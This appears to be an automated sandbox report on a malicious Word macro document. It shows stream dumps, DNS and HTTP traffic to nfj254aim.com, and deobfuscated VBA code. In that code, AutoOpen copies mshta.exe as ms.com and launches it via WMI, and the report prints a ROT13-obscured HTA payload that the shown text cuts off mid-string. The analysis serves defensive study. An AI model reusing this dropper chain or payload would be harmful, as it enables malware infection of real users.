Data Raw:	93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00

Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 230

General
Stream Path:	VBA/__SRP_1
File Type:	data
Stream Size:	230
Entropy:	1.75961915218
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 348

General
Stream Path:	VBA/__SRP_2
File Type:	data
Stream Size:	348
Entropy:	1.78450864632
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . ` . . . A . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 91 07 00 00 00 00 00 00 00 00 00 00 c1 07 00 00 00 00 00 00 00 00 00 00 11 08

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 106

General
Stream Path:	VBA/__SRP_3
File Type:	data
Stream Size:	106
Entropy:	1.35911194617
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 00 00 00 00 00 00 62 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00

Stream Path: VBA/dir, File Type: data, Stream Size: 775

General
Stream Path:	VBA/dir
File Type:	data
Stream Size:	775
Entropy:	6.59935768005
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . a . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . .
Data Raw:	01 03 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 95 d8 b6 61 10 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2020 10:05:57.413501024 CET	49167	80	192.168.2.22	172.67.164.220
Dec 3, 2020 10:05:57.435417891 CET	80	49167	172.67.164.220	192.168.2.22
Dec 3, 2020 10:05:57.435554028 CET	49167	80	192.168.2.22	172.67.164.220
Dec 3, 2020 10:05:57.436784983 CET	49167	80	192.168.2.22	172.67.164.220
Dec 3, 2020 10:05:57.458662987 CET	80	49167	172.67.164.220	192.168.2.22
Dec 3, 2020 10:05:57.879070997 CET	80	49167	172.67.164.220	192.168.2.22
Dec 3, 2020 10:05:57.879098892 CET	80	49167	172.67.164.220	192.168.2.22
Dec 3, 2020 10:05:57.879371881 CET	49167	80	192.168.2.22	172.67.164.220
Dec 3, 2020 10:07:47.263936996 CET	49167	80	192.168.2.22	172.67.164.220
Dec 3, 2020 10:07:47.287331104 CET	80	49167	172.67.164.220	192.168.2.22
Dec 3, 2020 10:07:47.287419081 CET	49167	80	192.168.2.22	172.67.164.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2020 10:05:57.314524889 CET	52197	53	192.168.2.22	8.8.8.8
Dec 3, 2020 10:05:57.354221106 CET	53	52197	8.8.8.8	192.168.2.22
Dec 3, 2020 10:05:57.354700089 CET	52197	53	192.168.2.22	8.8.8.8
Dec 3, 2020 10:05:57.395246029 CET	53	52197	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 3, 2020 10:05:57.314524889 CET	192.168.2.22	8.8.8.8	0xa343	Standard query (0)	nfj254aim.com	A (IP address)	IN (0x0001)
Dec 3, 2020 10:05:57.354700089 CET	192.168.2.22	8.8.8.8	0xa343	Standard query (0)	nfj254aim.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Dec 3, 2020 10:05:57.354221106 CET	8.8.8.8	192.168.2.22	0xa343	No error (0)	nfj254aim.com	172.67.164.220	A (IP address)	IN (0x0001)
Dec 3, 2020 10:05:57.354221106 CET	8.8.8.8	192.168.2.22	0xa343	No error (0)	nfj254aim.com	104.28.6.227	A (IP address)	IN (0x0001)
Dec 3, 2020 10:05:57.354221106 CET	8.8.8.8	192.168.2.22	0xa343	No error (0)	nfj254aim.com	104.28.7.227	A (IP address)	IN (0x0001)
Dec 3, 2020 10:05:57.395246029 CET	8.8.8.8	192.168.2.22	0xa343	No error (0)	nfj254aim.com	172.67.164.220	A (IP address)	IN (0x0001)
Dec 3, 2020 10:05:57.395246029 CET	8.8.8.8	192.168.2.22	0xa343	No error (0)	nfj254aim.com	104.28.6.227	A (IP address)	IN (0x0001)
Dec 3, 2020 10:05:57.395246029 CET	8.8.8.8	192.168.2.22	0xa343	No error (0)	nfj254aim.com	104.28.7.227	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

nfj254aim.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	172.67.164.220	80	C:\Users\Public\ms.com

Timestamp	kBytes transferred	Direction	Data
Dec 3, 2020 10:05:57.436784983 CET	1	OUT	GET /analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: nfj254aim.com Connection: Keep-Alive
Dec 3, 2020 10:05:57.879070997 CET	2	IN	HTTP/1.1 200 OK Date: Thu, 03 Dec 2020 09:05:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=dfea0fff404279bf026617fbd4da27f291606986357; expires=Sat, 02-Jan-21 09:05:57 GMT; path=/; domain=.nfj254aim.com; HttpOnly; SameSite=Lax X-Powered-By: PHP/7.2.34 CF-Cache-Status: DYNAMIC cf-request-id: 06c972f2c70000c761708a0000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=HrjYFSYj%2B7Ewvz2viDN7Me0D04tc91XHAAtZFOd2PuUuLFqOnb%2Fj%2Bj4%2FOfOKOXDQMtJHRBk0seN3awSM8a1EXrhtAR9vHctN0TX0%2BFvx"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 5fbc20fe0f8ac761-AMS Content-Encoding: gzip Data Raw: 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3f 0f 82 30 14 c4 f7 7e 8a 27 bb 3c 20 8c 2f 1d 14 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d fe f9 f6 06 58 5c ef ee 77 77 b4 49 4e 7b 71 a9 52 38 88 63 01 55 bd 2b f2 3d 78 5b c4 3c 15 19 62 22 92 d5 89 fc 00 31 2d 3d ce 48 bb 47 c7 49 ab 46 72 46 ae 75 9d e2 71 10 43 69 1c 64 66 ea 25 e1 2a 32 c2 25 44 57 23 bf 33 17 f2 bf 8c 0e 39 a3 81 0b ad 60 54 cf 49 59 a7 24 d4 e7 02 bc 8f 1d 6e 32 f2 e0 dd 58 e8 8d 83 fb 0c 80 e9 c1 e9 d6 82 55 e3 4b 8d 3e e1 30 0f 2c d5 84 cb 25 f6 03 00 00 ff ff 03 00 0c 45 8d 50 cd 00 00 00 0d 0a Data Ascii: baL?0~'< /$mMI"-X\wwIN{qR8cU+=x[<b"1-=HGIFrFuqCidf%*2%DW#39`TIY$n2XUK>0,%EP
Dec 3, 2020 10:05:57.879098892 CET	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 1320 Parent PID: 584

General

Start time:	10:05:38
Start date:	03/12/2020
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13fa80000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: ms.com PID: 2524 Parent PID: 1220

General

Start time:	10:05:40
Start date:	03/12/2020
Path:	C:\Users\Public\ms.com
Wow64 process (32bit):	false
Commandline:	C:\users\public\ms.com C:\users\public\ms.html
Imagebase:	0x13f2a0000
File size:	13824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Module: a7A5m

Declaration

Line	Content
1	Attribute VB_Name = "a7A5m"

Executed Functions

Subroutine awAlq, APIs: 6, Strings: 0, Number of lines: 6, Relevance: 12.006

APIs	Meta Information
Part of subcall function akSqK@a7A5m: Replace
Part of subcall function akSqK@a7A5m: a7odJ
Part of subcall function aSGxU@a7A5m: Len
Part of subcall function aSGxU@a7A5m: Mid
a3IdJQ
create	SWbemObjectEx.create("C:\users\public\ms.com C:\users\public\ms.html") -> 0

Line	Instruction	Meta Information
42	Sub awAlq()
47	aYKyQ	executed
52	axIuO
65	agPh8 = akSqK(aSGxU(a3IdJQ))	a3IdJQ
66	CreateObject(agPh8).create (axSiN)	SWbemObjectEx.create("C:\users\public\ms.com C:\users\public\ms.html") -> 0 executed
67	End Sub

Function akSqK, APIs: 2, Strings: 1, Number of lines: 3, Relevance: 10.503

APIs

Meta Information

Replace

Replace(")c):)\)w)i)n)d)o)w)s)\)s)y)s)t)e)m)3)2)\)m)s)h)t)a).)e)x)e)",")","") -> c:\windows\system32\mshta.exe Replace(")C):)\)u)s)e)r)s)\)p)u)b)l)i)c)\)m)s).)c)o)m)",")","") -> C:\users\public\ms.com Replace(")C):)\)u)s)e)r)s)\)p)u)b)l)i)c)\)m)s).)h)t)m)l",")","") -> C:\users\public\ms.html Replace("win)mgm)ts:)roo)t\c)imv)2:W)in3)2_P)roc)ess",")","") -> winmgmts:root\cimv2:Win32_Process

a7odJ

Strings	Decrypted Strings
""""

Line	Instruction	Meta Information
39	Public Function akSqK(aPENSZ)
40	akSqK = Replace(aPENSZ, a7odJ, "")	Replace(")c):)\)w)i)n)d)o)w)s)\)s)y)s)t)e)m)3)2)\)m)s)h)t)a).)e)x)e)",")","") -> c:\windows\system32\mshta.exe a7odJ executed
41	End Function

Function aSGxU, APIs: 2, Strings: 0, Number of lines: 7, Relevance: 4.507

APIs	Meta Information
Len	Len("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)\|)o)t)o)m) )o)l)l)e)h)") -> 174 Len("sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw") -> 43
Mid

Line	Instruction	Meta Information
2	Function aSGxU(aie8CL)
33	For a6mGn = Len(aie8CL) To 1 Step - 1	Len("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)\|)o)t)o)m) )o)l)l)e)h)") -> 174 executed
34	azUoN = Mid(aie8CL, a6mGn, 1)	Mid
35	adHaPl = adHaPl & azUoN
36	Next	Len("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)\|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)\|)o)t)o)m) )o)l)l)e)h)") -> 174 executed
37	aSGxU = adHaPl
38	End Function

Module: aH8xms

Declaration

Line	Content
1	Attribute VB_Name = "aH8xms"

Executed Functions

Subroutine AutoOpen, APIs: 2, Strings: 0, Number of lines: 3, Relevance: 4.503

APIs	Meta Information
Part of subcall function awAlq@a7A5m: a3IdJQ
Part of subcall function awAlq@a7A5m: create

Line	Instruction	Meta Information
2	Sub AutoOpen()
3	awAlq	executed
4	End Sub

Module: aIsb7

Declaration

Line	Content
1	Attribute VB_Name = "aIsb7"

Executed Functions

Function aCqnt, APIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

APIs	Meta Information
Part of subcall function akSqK@a7A5m: Replace
Part of subcall function akSqK@a7A5m: a7odJ

Line	Instruction	Meta Information
2	Function aCqnt(ayM1o)
6	aCqnt = akSqK(ayM1o)	executed
7	End Function

Function aMslO, APIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

APIs	Meta Information
Part of subcall function akSqK@a7A5m: Replace
Part of subcall function akSqK@a7A5m: a7odJ

Line	Instruction	Meta Information
8	Function aMslO(aucpr)
13	aMslO = (akSqK(aucpr))	executed
14	End Function

Function ayUxA2, APIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

APIs	Meta Information
Part of subcall function akSqK@a7A5m: Replace
Part of subcall function akSqK@a7A5m: a7odJ

Line	Instruction	Meta Information
15	Function ayUxA2(aT2PX)
20	ayUxA2 = (akSqK(aT2PX))	executed
21	End Function

Subroutine aVzRp, APIs: 1, Strings: 0, Number of lines: 5, Relevance: 1.255

APIs	Meta Information
Part of subcall function amZcqK@abh0Rg: FileCopy

Line	Instruction	Meta Information
27	Sub aVzRp()
28	acIr6u = aCqnt(adkJvD(0))	executed
29	adeKx = aMslO(adkJvD(1))
30	amZcqK acIr6u, adeKx
31	End Sub

Function a9vceZ, APIs: 1, Strings: 0, Number of lines: 3, Relevance: 1.253

APIs	Meta Information
Chr

Line	Instruction	Meta Information
62	Function a9vceZ(a48o6)
63	a9vceZ = Chr(a48o6)	Chr executed
64	End Function

Function a3eJx, APIs: 0, Strings: 0, Number of lines: 9, Relevance: 0.009000000000000001

Line	Instruction	Meta Information
35	Function a3eJx(aFP9Ao)
36	If aFP9Ao = 0 Then	executed
37	a3eJx = - 6824 + 6825
53	Elseif aFP9Ao = 5 Then
54	a3eJx = - 63 + 160
55	Else
56	a3eJx = 1049 - 25
57	Endif
58	End Function

Function axSiN, APIs: 0, Strings: 0, Number of lines: 5, Relevance: 0.005

Line	Instruction	Meta Information
22	Function axSiN()
23	adeKx = aMslO(adkJvD(1))	executed
24	aaqRT = ayUxA2(adkJvD(2))
25	axSiN = adeKx & " " & aaqRT
26	End Function

Function a3ox6, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
32	Function a3ox6(a48o6)
33	a3ox6 = a48o6 + - 158 + 184	executed
34	End Function

Function aYzBn, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
59	Function aYzBn(a48o6, a20NB)
60	aYzBn = a48o6 - a20NB	executed
61	End Function

Module: aOMv0

Declaration

Line	Content
1	Attribute VB_Name = "aOMv0"

Executed Functions

Function a6sXJE, APIs: 5, Strings: 0, Number of lines: 22, Relevance: 9.022

APIs	Meta Information
Len	Len("<ugzy> <obql> <fpevcg ynathntr="wninfpevcg"> ine n3ZDj4 = gehr; ine n3lnYb = -47909; shapgvba qrpbqr(vachg) { ine xrlfge = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/="; ine bhgchg = ""; ine pue1, pue2, pue3; ine rap1, rap2, rap3, rap4; ine v = 0; vachg = vachg.ercynpr(/[^N-Mn-m0-9\+\/\=]/t, ""); juvyr (v < vachg.yratgu) { rap1 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap2 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap3 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap4 = xrlfge.vaqrkBs(vachg.puneNg(v++)); pue1 = (rap1 << 2) \| (rap2 >> 4); pue2 = ((rap2 & 15) << 4) \| (rap3 >> 2); pue3 = ((rap3 & 3) << 6) \| rap4; bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue1); vs(rap3 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue2); } vs(rap4 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue3); } } erghea(bhgchg); } ine nIRdc = gehr; ine ngcbN = "UXRL_PHEERAG_HFRE\\Fbsgjner\\nUtIG\\nhW5i2"; ine n7CwL = "n9VyF"; ine n4dtjh = n7CwL.yratgu; naQ3Jo = gehr; jvaqbj.erfvmrGb(1, 1); nwElY = -57746; ine nZhWU = gehr; jvaqbj.zbirGb(-101, -101); n2Bef = 17403; ine nWLt6 = gehr; ine nTWls = gehr; ine nCgZ7i = arj NpgvirKBowrpg("jfpevcg.furyy"); nuJ5n = 16458; nbdxF = "n21uHX"; ine njeCc = nbdxF.gbHccrePnfr(); ine nLCO4j = "ngbCL0"; nf14m = nLCO4j.gbFgevat(); ntMYZ = "nkQd5q"; n0CTb = snyfr; ine nxrv9d = "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) -> 17902
Mid
Asc
as8nLc
Part of subcall function a9vceZ@aIsb7: Chr

Line	Instruction	Meta Information
2	Function a6sXJE(a2cCM) as String
3	Dim as6h1W as Long	executed
4	Dim aDKIk as Integer
5	Dim aJjwu as Integer
6	For as6h1W = 1 To VBA.Len(a2cCM) Step 1	Len("<ugzy> <obql> <fpevcg ynathntr="wninfpevcg"> ine n3ZDj4 = gehr; ine n3lnYb = -47909; shapgvba qrpbqr(vachg) { ine xrlfge = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/="; ine bhgchg = ""; ine pue1, pue2, pue3; ine rap1, rap2, rap3, rap4; ine v = 0; vachg = vachg.ercynpr(/[^N-Mn-m0-9\+\/\=]/t, ""); juvyr (v < vachg.yratgu) { rap1 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap2 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap3 = xrlfge.vaqrkBs(vachg.puneNg(v++)); rap4 = xrlfge.vaqrkBs(vachg.puneNg(v++)); pue1 = (rap1 << 2) \| (rap2 >> 4); pue2 = ((rap2 & 15) << 4) \| (rap3 >> 2); pue3 = ((rap3 & 3) << 6) \| rap4; bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue1); vs(rap3 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue2); } vs(rap4 != 64) { bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue3); } } erghea(bhgchg); } ine nIRdc = gehr; ine ngcbN = "UXRL_PHEERAG_HFRE\\Fbsgjner\\nUtIG\\nhW5i2"; ine n7CwL = "n9VyF"; ine n4dtjh = n7CwL.yratgu; naQ3Jo = gehr; jvaqbj.erfvmrGb(1, 1); nwElY = -57746; ine nZhWU = gehr; jvaqbj.zbirGb(-101, -101); n2Bef = 17403; ine nWLt6 = gehr; ine nTWls = gehr; ine nCgZ7i = arj NpgvirKBowrpg("jfpevcg.furyy"); nuJ5n = 16458; nbdxF = "n21uHX"; ine njeCc = nbdxF.gbHccrePnfr(); ine nLCO4j = "ngbCL0"; nf14m = nLCO4j.gbFgevat(); ntMYZ = "nkQd5q"; n0CTb = snyfr; ine nxrv9d = 